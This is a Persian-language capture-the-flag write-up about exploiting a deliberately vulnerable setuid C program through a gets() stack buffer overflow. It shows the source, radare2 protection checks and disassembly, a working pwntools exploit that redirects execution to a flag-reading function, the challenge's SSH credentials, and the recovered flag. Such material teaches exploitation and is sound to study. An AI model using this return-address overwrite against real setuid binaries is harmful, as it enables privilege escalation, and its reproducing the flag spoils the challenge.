چالش سیستم‌عامل دوم: خرید روزانه

توضیحات

کاغذ یادداشت خریدها را گم کرده‌ام. چه چیزی باید می‌خریدم؟
اطلاعات ورود:

ssh -p 8025 user1@86.104.33.87
password: Y2MyZTJjN2YxYTdiZjdjNmJiNGQyYTI

حل چالش

در این چالش پس از اتصال ssh دو فایل می‌بینییم و به نظر می‌رسد که روش حل سوال اکسپلویت فایل باینری است. قبل از اینکه فایل را برای بررسی باز کنیم دقت می‌کنیم که این فایل نیز با فلگ setuid قرار گرفته است.

-r-sr-xr-x 1 flag flag 17024 Feb 10 00:13 code

کد این فایل نیز برای سادگی در سرور قرار دارد. در واقع در صورت عدم وجود آن باید یک مرحله مهندسی معکوس انجام شود که برای این سوال با داشتن کد منبع لازم نیست.

کد این سوال به شکل زیر است:

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

void notCallMe() {
  char *envp[] = { NULL };
  char *argv[] = {"/bin/cat", "/home/flag/flag.txt", NULL};
  execve("/bin/cat", argv, envp);
}

void callMe() {
  char buffer[64];
  printf("%p\n", *notCallMe);
  fflush(stdout);
  gets(buffer);
}

int main(int argc, char** argv) {
  callMe();

  printf("Exiting...\n");
  exit(0);
}

همان‌طور که مشخص است کد ساده‌ای است که دو تابع دارد که یکی پرچم را می‌خواند و البته در برنامه‌ی اصلی صدا زده نشده است و دومین تابع که آدرس تابع اول را چاپ می‌کند صدا زده شده است.

بنابراین برای حل باید از آسیب‌پذیری سرریز بافر در تابع callMe که به دلیل فراخوانی تابع ناامن gets() وجود دارد، استفاده کنیم و سپس روند اجرای برنامه را تغییر داده و تابع notCallMe را صدا بزنیم.

قبل از آن نیاز داریم سازوکارهای امنیتی این فایل را بررسی کنیم. برای این کار ابتدا فایل را در سیستم خودمان کپی می‌کنیم:

scp -P 8025 user1@86.104.33.87:~/code ~/parcham/os2

سپس با استفاده از رادار اطلاعات فایل را می‌خوانیم:

$ radare2 code 
 -- radare2 is like windows 7 but even better.
[0x00001100]> iI
arch   x86
baddr  0x0
binsz  15033
bintype elf
bits   64
canary  false
class  ELF64
compiler GCC: (Ubuntu 9.3.0-17ubuntu1~20.04) 9.3.0
crypto  false
endian  little
havecode true
intrp  /lib64/ld-linux-x86-64.so.2
laddr  0x0
lang   c
linenum true
lsyms  true
machine AMD x86-64 architecture
maxopsz 16
minopsz 1
nx    true
os    linux
pcalign 0
pic   true
relocs  true
relro  full
rpath  NONE
sanitiz false
static  false
stripped false
subsys  linux
va    true

همان‌طور که می‌بینیم مقدار canary تنظیم نشده است. پس می‌توان یک اکسپلویت ساده نوشت هم‌چنین با یک فایل باینری ۶۴ بیتی مواجه هستیم.

در نهایت برای اطمینان از ساختار برنامه و اندازه‌ی بافر به سراغ باینری می‌رویم و دستورات زیر را اجرا می‌کنیم تا مطمئن باشیم اندازه‌ی بافر چقدر باید باشد:


[0x00001100]> aa
[x] Analyze all flags starting with sym. and entry0 (aa)
[0x00001100]> afl
0x00001100  1 46      entry0
0x00001130  4 41  -> 34  sym.deregister_tm_clones
0x00001160  4 57  -> 51  sym.register_tm_clones
0x000011a0  5 57  -> 54  sym.__do_global_dtors_aux
0x00001090  1 11      sym..plt.got
0x000011e0  1 9      entry.init0
0x00001000  3 27      sym._init
0x00001320  1 5      sym.__libc_csu_fini
0x000011e9  1 76      sym.notCallMe
0x000010c0  1 11      sym.imp.execve
0x00001328  1 13      sym._fini
0x000012b0  4 101     sym.__libc_csu_init
0x0000127c  1 51      main
0x00001235  1 71      sym.callMe
0x000010b0  1 11      sym.imp.printf
0x000010e0  1 11      sym.imp.fflush
0x000010d0  1 11      sym.imp.gets
0x000010a0  1 11      sym.imp.puts
0x000010f0  1 11      sym.imp.exit
[0x00001100]> sf sym.callMe
[0x00001235]> pd
pd?    pd    pd--   pda    pdb    pdc    pdC    pdf    pdi    pdj    pdJ    pdk    
pdl    pdp    pdr    pdr.   pdR    pds?   pds    pdsb   pdsf   pdt    pdd    pdd?   
pdd*   pdda   pddb   pddc   pddf   pddi   pdds   pddu   
[0x00001235]> pdf
      ; CALL XREF from main @ 0x1294
┌ 71: sym.callMe ();
│      ; var int64_t var_40h @ rbp-0x40
│      0x00001235   f30f1efa    endbr64
│      0x00001239   55       push rbp
│      0x0000123a   4889e5     mov rbp, rsp
│      0x0000123d   4883ec40    sub rsp, 0x40
│      0x00001241   488d35a1ffff. lea rsi, [sym.notCallMe]  ; 0x11e9
│      0x00001248   488d3dd20d00. lea rdi, [0x00002021]    ; "%p\n"
│      0x0000124f   b800000000   mov eax, 0
│      0x00001254   e857feffff   call sym.imp.printf     ; int printf(const char *format)
│      0x00001259   488b05b02d00. mov rax, qword [obj.stdout] ; obj.__TMC_END
│                                   ; [0x4010:8]=0
│      0x00001260   4889c7     mov rdi, rax
│      0x00001263   e878feffff   call sym.imp.fflush     ; int fflush(FILE *stream)
│      0x00001268   488d45c0    lea rax, [var_40h]
│      0x0000126c   4889c7     mov rdi, rax
│      0x0000126f   b800000000   mov eax, 0
│      0x00001274   e857feffff   call sym.imp.gets      ; char *gets(char *s)
│      0x00001279   90       nop
│      0x0000127a   c9       leave
└      0x0000127b   c3       ret
[0x00001235]>

طول بافر ۴۰ بایت هگزادسیمال یا همان ۶۴ بایت است.
پس مقداری که برای رونویسی این بافر نیاز داریم به شکل زیر است:

payload = [64 bytes junk for buffer] + [8 bytes to wtire old rbp] + [address of notCallMe]

دقت می‌کنیم که آدرس تابع notCallMe در هر بار اجرا تغییر می‌کند ولی همان آدرس در فراخوانی callMe به کاربر ارائه می‌شود.

مهم‌ترین چالش این است که خروجی این تابع را بخوانیم و سپس همزمان همین خروجی را استفاده کرده تا رشته‌ای را بسازیم و به برنامه ارسال کنیم. راه پیشنهادی ما این است:

sshpass -p Y2MyZTJjN2YxYTdiZjdjNmJiNGQyYTI ssh -p 8025 user1@86.104.33.87 ./code

با نصب این ابزار می‌توانید با ارسال همزمان گذرواژه خروجی اجرای کد را ببینید. البته حتما بررسی کنید که خروجی هشدار چند خط است. مثلا در اینجا سه خط خروجی می‌گیریم که فقط خط آخر برای ما مهم است و در واقع آدرس تابع است.

در نهایت یک اسکریپت پایتون می‌نویسم و پرچم را به دست می‌آوریم. ما از اسکریپت زیر استفاده کرده‌ایم:

from pwn import *
cmd = 'sshpass -p Y2MyZTJjN2YxYTdiZjdjNmJiNGQyYTI ssh -p 8025 user1@86.104.33.87 ./code'
io = process(cmd, True)
x = io.recvline()
x = io.recvline()
x = io.recvline()

io.sendline(b'a'*(64+8) + p64(int(x, 16)))
print(io.recvall())

با اجرای آن به صورت محلی به خروجی زیر رسیدیم:

$ python3 t.py 
[+] Starting local process '/bin/sh': pid 32625
[+] Receiving all data: Done (42B)
[*] Process '/bin/sh' stopped with exit code 0 (pid 32625)
b'parcham{5654794b7e0e5b4a75e07fa7b515b295}\n'